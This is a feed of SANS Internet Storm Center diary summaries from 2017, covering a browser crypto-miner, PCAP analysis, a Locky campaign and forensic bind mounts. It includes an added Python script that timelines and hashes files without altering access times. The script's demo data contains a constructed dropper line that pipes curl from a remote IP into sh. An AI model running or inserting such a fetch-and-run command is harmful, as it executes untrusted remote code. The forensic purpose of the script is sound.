Who's Borrowing your Resources?, (Sat, Sep 30th)

SANS Internet Storm Center - October 1, 2017 - 1:44pm
There is a buzz that started to stir in the past few days with the rise of cryptocurrency miner JavaScript code showing up on various websites. In particular, it seems to be Coinhive's miner JavaScript code. I do want to note that Coinhive specifically states:
Categories: Security

Good Analysis = Understanding(tools + logs + normal), (Fri, Sep 29th)

SANS Internet Storm Center - September 29, 2017 - 8:40pm
We had a reader send an email in a couple of weeks ago asking about understanding the flags field when looking at data in a report. He didn't understand what the "flags" were referring to or what the actual flags mean. "They don't appear related to TCP header flags like I've normally seen... S is the most common but I occasionally see RSA, RUS and a few others."
Categories: Security

The easy way to analyze huge amounts of PCAP data, (Thu, Sep 28th)

SANS Internet Storm Center - September 28, 2017 - 8:04am
When you are investigating a security incident, there is a good chance that, at a certain point, you will have to dive into network traffic analysis. If you're lucky, you'll have access to a network capture. Approximately one year ago, I wrote a quick diary[1] to explain how to implement a simple FPC or "Full Packet Capture" solution based on a Docker container. It's nice to capture all the traffic in PCAP files, but then what? PCAP files are not convenient to process and they consume a lot of disk space (depending on the captured traffic, of course).
Categories: Security

It is a resume - Part 3, (Sun, Sep 10th)

SANS Internet Storm Center - September 27, 2017 - 9:17am
In this short series of diary entries, I show how I try to conclude that a PDF file (a resume) is not malicious, but benign. This is the last part. Thanks to Xavier for letting me post this during his shift.
Categories: Security

Forensic use of mount --bind, (Sun, Sep 24th)

SANS Internet Storm Center - September 24, 2017 - 1:28am
In my previous diary, I mentioned a recent case that led me to write In that case, I mentioned that I needed to build a filesystem timeline and wanted to collect hashes because I suspected there were multiple copies of some possible malware scattered around the disk. The biggest issue I had was that hashing the files requires reading them, which would update the access times, something I really did not want to do. So, I decided to use a trick on a live system that I had employed occasionally in the past when I got a tar file rather than a disk image of, say, a directory from a SAN or NAS. For those of you who aren't aware, on Linux, you can use the mount command to essentially link a directory to another location in the directory tree. In the screenshot below, you can see the results of df -h and mount on one of my test VMs.
Categories: Security
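The goal described in this diary is a filesystem timeline plus content hashes taken without disturbing access times, which the author reaches by bind-mounting the directory elsewhere. The script below is an added example, not the diary's or its author's code: it reaches the same goal with Linux's O_NOATIME open flag instead of a bind mount (a swapped-in technique; it needs file ownership or CAP_FOWNER, and is Linux-only), walks a tree with lstat so symlinks are never followed, hashes regular files, and groups identical content to spot copies scattered around a disk. The sample tree, its paths and the "dropper" content are constructed for the demo and have nothing to do with the case in the diary.

```python
"""Timeline + hashes without touching atime (added example, not from the diary).

The diary uses a bind mount; this uses Linux O_NOATIME instead. Sample data
below is constructed for the demo.
"""
import hashlib
import os
import stat
import tempfile


def sha256_noatime(path, chunk_size=1 << 16):
    """Hash a file without updating its access time.

    O_NOATIME stops the kernel from bumping atime even on a strictatime or
    relatime mount. It requires ownership of the file or CAP_FOWNER; if the
    kernel refuses (EPERM) we fail loud rather than silently alter evidence.
    O_NOFOLLOW makes the open fail on a symlink instead of following it.
    """
    if not hasattr(os, "O_NOATIME"):
        raise RuntimeError("O_NOATIME is Linux-only; use a read-only noatime bind mount instead")
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOATIME | os.O_NOFOLLOW)
    except PermissionError as e:
        raise PermissionError(f"O_NOATIME refused for {path}: need ownership or CAP_FOWNER") from e
    h = hashlib.sha256()
    try:
        while True:
            chunk = os.read(fd, chunk_size)
            if not chunk:
                break
            h.update(chunk)
    finally:
        os.close(fd)
    return h.hexdigest()


def build_timeline(root):
    """Walk root with lstat (never following symlinks), hash every regular file
    and return one record per file sorted by mtime. Times are recorded before
    the hash so they reflect the pre-collection state.
    Caveat: os.walk reads directories, which can bump directory atimes; a
    read-only noatime bind mount (the diary's approach) avoids even that."""
    rows = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets, devices: not content to hash
            rows.append({
                "path": path,
                "size": st.st_size,
                "atime_ns": st.st_atime_ns,
                "mtime_ns": st.st_mtime_ns,
                "ctime_ns": st.st_ctime_ns,
                "sha256": sha256_noatime(path),
            })
    rows.sort(key=lambda r: r["mtime_ns"])
    return rows


def duplicate_hashes(rows):
    """Group paths by content hash; keep only hashes seen more than once."""
    by_hash = {}
    for r in rows:
        by_hash.setdefault(r["sha256"], []).append(r["path"])
    return {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}


def atime_preserved(path):
    """True if hashing `path` left its access time untouched."""
    before = os.lstat(path).st_atime_ns
    sha256_noatime(path)
    return os.lstat(path).st_atime_ns == before


def run_demo():
    """Build a constructed sample tree, age its atimes so a plain read would
    update them under relatime, then timeline and hash it. Returns a summary."""
    with tempfile.TemporaryDirectory() as base:
        dropper = b"#!/bin/sh\ncurl -s http://198.51.100.7/p | sh\n"  # constructed content
        sample = {
            "var/tmp/.x/update": dropper,
            "home/bob/.cache/update": dropper,  # second copy of the same content
            "etc/motd": b"Welcome\n",
        }
        for rel, data in sample.items():
            p = os.path.join(base, rel)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "wb") as f:
                f.write(data)
            st = os.lstat(p)
            # atime one day behind mtime: relatime would refresh it on a normal read
            os.utime(p, ns=(st.st_mtime_ns - 86_400 * 10**9, st.st_mtime_ns))
        os.symlink(os.path.join(base, "etc/motd"), os.path.join(base, "etc/motd.link"))
        preserved = atime_preserved(os.path.join(base, "var/tmp/.x/update"))
        rows = build_timeline(base)
        dups = duplicate_hashes(rows)
        return {
            "files": len(rows),  # the symlink must not be counted
            "atime_preserved": preserved,
            "dup_groups": len(dups),
            "dup_size": max((len(v) for v in dups.values()), default=0),
            "sorted_ok": all(rows[i]["mtime_ns"] <= rows[i + 1]["mtime_ns"]
                             for i in range(len(rows) - 1)),
        }


if __name__ == "__main__":
    print(run_demo())
```

On a real case, point build_timeline at the suspect directory while running as root (which has CAP_FOWNER, so O_NOATIME is honoured on every file) and write the rows out in a body-file format for your timeline tool; the duplicate_hashes groups are the "multiple copies" the diary was hunting for.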

What is the State of Your Union? , (Fri, Sep 22nd)

SANS Internet Storm Center - September 23, 2017 - 12:54am
Regularly, the President of the United States delivers the State of the Union address. This practice "fulfills rules in Article II, Section 3 of the U.S. Constitution, requiring the President to periodically give Congress information on the 'state of the union' and recommend any measures that he believes are necessary and expedient."
Categories: Security

Ongoing Ykcol (Locky) campaign, (Wed, Sep 20th)

SANS Internet Storm Center - September 20, 2017 - 8:12pm
Today I noticed a high amount of e-mails on my honeypots with similar subject, body and attachment. It caught my attention. After inspecting the attachments and doing some analysis, it was not difficult to realize that those supposed "Status Invoice" messages were, indeed, part of an ongoing campaign pushing a Locky ransomware variant that is being called Ykcol (or Locky in reverse) due to the encrypted file extension (".ykcol").
Categories: Security
